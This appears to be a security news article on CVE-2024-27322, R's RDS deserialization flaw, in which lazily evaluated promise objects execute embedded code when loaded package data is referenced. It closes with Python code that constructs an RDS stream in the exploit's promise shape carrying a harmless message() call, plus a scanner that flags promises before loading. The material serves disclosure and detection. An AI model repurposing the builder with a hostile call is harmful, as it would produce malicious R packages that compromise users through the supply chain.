A security vulnerability has been disclosed in the R programming language that could be exploited by a threat actor to craft a malicious RDS (R Data Serialization) file that results in code execution when it is loaded and referenced.
Tracked as CVE-2024-27322, the flaw, described by AI application security firm HiddenLayer in a report shared with The Hacker News, involves the use of promise objects and lazy evaluation in R.
Like Python's pickle, RDS is a format for serializing and saving the state of data structures or objects in R, a widely used open-source language for statistical computing, data visualization, and machine learning.
Serialization, done with serialize() or saveRDS(), and deserialization, done with unserialize() or readRDS(), are also used when R packages are saved and loaded.
At the root of CVE-2024-27322 is that deserializing untrusted data can lead to arbitrary code execution, which exposes users to supply chain attacks through specially crafted R packages.
The vulnerability can be exploited because R packages use the RDS format to save and load their data, so code can be executed automatically when a package is decompressed and deserialized.
HiddenLayer notes that R packages are vulnerable to this exploit and can therefore be used as part of a supply chain attack via package repositories. To take over a package, an attacker only needs to overwrite its rdx file with the maliciously crafted file; when the package is loaded, the embedded code is executed automatically.
The vulnerability has been addressed in R version 4.4.0, released on April 24, 2024, following responsible disclosure.
HiddenLayer describes the exploit as crafting an RDS file that contains a promise instruction whose value is set to unbound_value and whose expression holds arbitrary code. Because R evaluates promises lazily, the expression is not evaluated until the associated symbol is accessed, at which point the embedded code runs.
An otherwise innocuous RDS file can therefore execute arbitrary code as soon as the symbol it is assigned to is referenced. If such an object is embedded in an R package and the package is pushed to a repository such as CRAN, the expression is triggered when the package is loaded, executing the code. As with pickle, the practical guidance is the same: do not deserialize RDS data from untrusted sources, and upgrade to R 4.4.0 or later.
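As an added illustration (this is not HiddenLayer's proof of concept and not R's own serializer or reader), the Python below assembles the object shape described above, a top-level promise whose value is unbound and whose code is an R call, in R's uncompressed XDR serialization format, and then walks such a stream to flag any promise before the bytes reach readRDS(). The type codes and field order follow R's public serialize.c; the helper names (build_promise_rds, scan_rds, contains_promise), the harmless message() payload and the subset of object types modelled are assumptions made for this example. Anything outside that subset makes the walker refuse the stream rather than guess.

```python
import gzip
import struct

# Type codes and flag bits from R's serialization format (src/main/serialize.c).
# Assumed from the public R sources; this is an added illustration, not R's code.
SYMSXP, LISTSXP, PROMSXP, LANGSXP, CHARSXP = 1, 2, 5, 6, 9
LGLSXP, INTSXP, REALSXP, STRSXP, VECSXP = 10, 13, 14, 16, 19
REFSXP, NILVALUE_SXP, GLOBALENV_SXP, UNBOUNDVALUE_SXP = 255, 254, 253, 252
MISSINGARG_SXP, EMPTYENV_SXP, BASEENV_SXP = 251, 242, 241
HAS_ATTR, HAS_TAG = 1 << 9, 1 << 10   # packed above the type byte in the flag word
ASCII_MASK = 64                       # CHARSXP encoding level for plain ASCII


def _int(n):
    return struct.pack(">i", n)       # XDR ints are 4-byte big-endian


def _flags(sexp_type, levels=0, tag=False):
    return _int(sexp_type | (levels << 12) | (HAS_TAG if tag else 0))


def _charsxp(s):
    b = s.encode("ascii")
    return _flags(CHARSXP, ASCII_MASK) + _int(len(b)) + b


def _symbol(name):
    return _flags(SYMSXP) + _charsxp(name)   # symbol = flags + print name


def string_vector(*strings):
    """Serialized STRSXP: flags, length, then one CHARSXP per element."""
    return _flags(STRSXP) + _int(len(strings)) + b"".join(map(_charsxp, strings))


def _call(fn, *args):
    """Serialized LANGSXP fn(args...): car = symbol, cdr = pairlist of args."""
    out = _flags(LANGSXP) + _symbol(fn)
    for a in args:
        out += _flags(LISTSXP) + a
    return out + _flags(NILVALUE_SXP)


def _header():
    # Format version 2, writer "4.3.0", minimum reader 2.3.0; uncompressed XDR.
    return b"X\n" + _int(2) + _int(0x040300) + _int(0x020300)


def build_promise_rds(fn, *args):
    """RDS stream whose top-level object is a promise: tag = PRENV (global env),
    car = PRVALUE (unbound, i.e. never forced), cdr = PRCODE (the call). This is
    the object shape the advisory describes; the call used here is harmless."""
    return (_header() + _flags(PROMSXP, tag=True) + _flags(GLOBALENV_SXP)
            + _flags(UNBOUNDVALUE_SXP) + _call(fn, *args))


def build_string_rds(*strings):
    return _header() + string_vector(*strings)


def scan_rds(data):
    """Walk an RDS stream and return the sequence of SEXP types encountered.
    Types this walker does not model raise ValueError so unknown input fails closed."""
    if data[:2] == b"\x1f\x8b":
        data = gzip.decompress(data)  # saveRDS() gzip-compresses by default
    if data[:2] != b"X\n":
        raise ValueError("not an XDR-format RDS stream")
    pos = 2

    def rd_int():
        nonlocal pos
        v = struct.unpack_from(">i", data, pos)[0]
        pos += 4
        return v

    version, _writer, _min_reader = rd_int(), rd_int(), rd_int()
    if version == 3:
        pos += rd_int()               # skip the native-encoding name
    seen = []

    def item():
        nonlocal pos
        flags = rd_int()
        t = flags & 0xFF
        seen.append(t)
        if t in (NILVALUE_SXP, GLOBALENV_SXP, UNBOUNDVALUE_SXP,
                 MISSINGARG_SXP, EMPTYENV_SXP, BASEENV_SXP):
            return                    # bare flag word, no payload
        if t == REFSXP:
            if flags >> 8 == 0:
                rd_int()              # index did not fit in the flag word
            return
        if t == CHARSXP:
            n = rd_int()              # -1 encodes NA_character_
            pos += max(n, 0)
            return
        if t == SYMSXP:
            item()                    # the print name, a CHARSXP
            return
        if t in (LISTSXP, LANGSXP, PROMSXP):
            if flags & HAS_ATTR:
                item()
            if flags & HAS_TAG:
                item()                # for a promise: PRENV
            item()                    # car; for a promise: PRVALUE
            item()                    # cdr; for a promise: PRCODE
            return
        if t in (LGLSXP, INTSXP, REALSXP, STRSXP, VECSXP):
            n = rd_int()
            if n < 0:
                raise ValueError("long vectors are not modelled")
            if t == REALSXP:
                pos += 8 * n
            elif t in (LGLSXP, INTSXP):
                pos += 4 * n
            else:
                for _ in range(n):
                    item()
            if flags & HAS_ATTR:
                item()                # vector attributes follow the data
            return
        raise ValueError(f"unmodelled SEXP type {t}; refusing to classify stream")

    item()
    if pos != len(data):
        raise ValueError("trailing bytes after top-level object")
    return seen


def contains_promise(data):
    """True if a PROMSXP appears anywhere in the serialized object graph."""
    return PROMSXP in scan_rds(data)


if __name__ == "__main__":
    # Constructed sample: the advisory's object shape carrying a harmless call.
    suspicious = build_promise_rds("message", string_vector("promise forced"))
    benign = build_string_rds("just", "data")
    print("promise payload flagged:", contains_promise(suspicious))  # True
    print("plain vector flagged:", contains_promise(benign))         # False
```

The constructed stream carries only a message() call, but its layout is what a hostile file would carry: a type byte of 5 (PROMSXP) followed by the environment, an UNBOUNDVALUE_SXP marker, and the LANGSXP that is evaluated the first time the loaded symbol is referenced. Running the walker over a file before readRDS() is a cheap pre-load check on R releases older than 4.4.0; it is not a substitute for upgrading, and its refusal of unmodelled types is deliberate, since a scanner that skips what it does not understand is exactly what an attacker would route around.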